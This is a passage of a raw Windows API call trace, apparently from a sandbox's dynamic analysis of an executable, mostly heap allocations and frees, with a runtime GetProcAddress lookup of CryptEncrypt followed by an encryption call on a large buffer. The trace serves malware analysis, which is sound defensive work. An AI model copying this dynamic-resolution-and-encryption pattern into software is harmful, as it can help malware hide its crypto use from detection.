hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0252.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0252.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0252.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0252.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0252.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0252.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0252.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0252.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0252.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0252.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0252.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0252.437] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0252.437] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.437] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0252.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0252.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0252.437] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0252.437] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0252.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0252.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0252.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0252.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0252.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0252.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0252.438] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0252.438] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0252.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0252.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0252.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0252.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0252.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0252.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0252.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0252.438] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0252.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0252.439] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0252.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0252.439] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.439] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0252.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0252.439] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d960 | out: hHeap=0x25c0000) returned 1 [0252.440] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.440] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0252.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0252.440] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0252.440] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0252.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0252.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0252.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0252.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0252.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0252.440] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d960 | out: hHeap=0x25c0000) returned 1 [0252.441] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0252.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0252.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0252.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0252.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0252.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0252.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0252.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0252.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0252.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0252.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0252.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0252.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0252.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0252.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0252.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0252.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0252.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0252.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0252.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0252.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c8b78 | out: hHeap=0x25c0000) returned 1 [0252.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0252.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0252.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0252.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0252.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.445] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0252.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0252.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0252.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0252.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0252.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0252.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0252.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0252.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0252.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0252.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aa910, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0252.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0252.448] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0252.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b6a30 [0252.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0252.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0252.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0252.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0252.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0252.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0252.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0252.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0252.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0252.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0252.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0252.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0252.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0252.449] CryptEncrypt (in: hKey=0xaa57a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x11122, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x11128) returned 1 [0252.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0252.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0252.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0252.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0252.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0252.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0252.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0252.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0252.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0252.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0252.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0252.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0252.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0252.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0252.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0252.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0252.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0252.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0252.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0252.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0252.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0252.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0252.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0252.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0252.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0252.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0252.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0252.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0252.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0252.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0252.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0252.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0252.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) 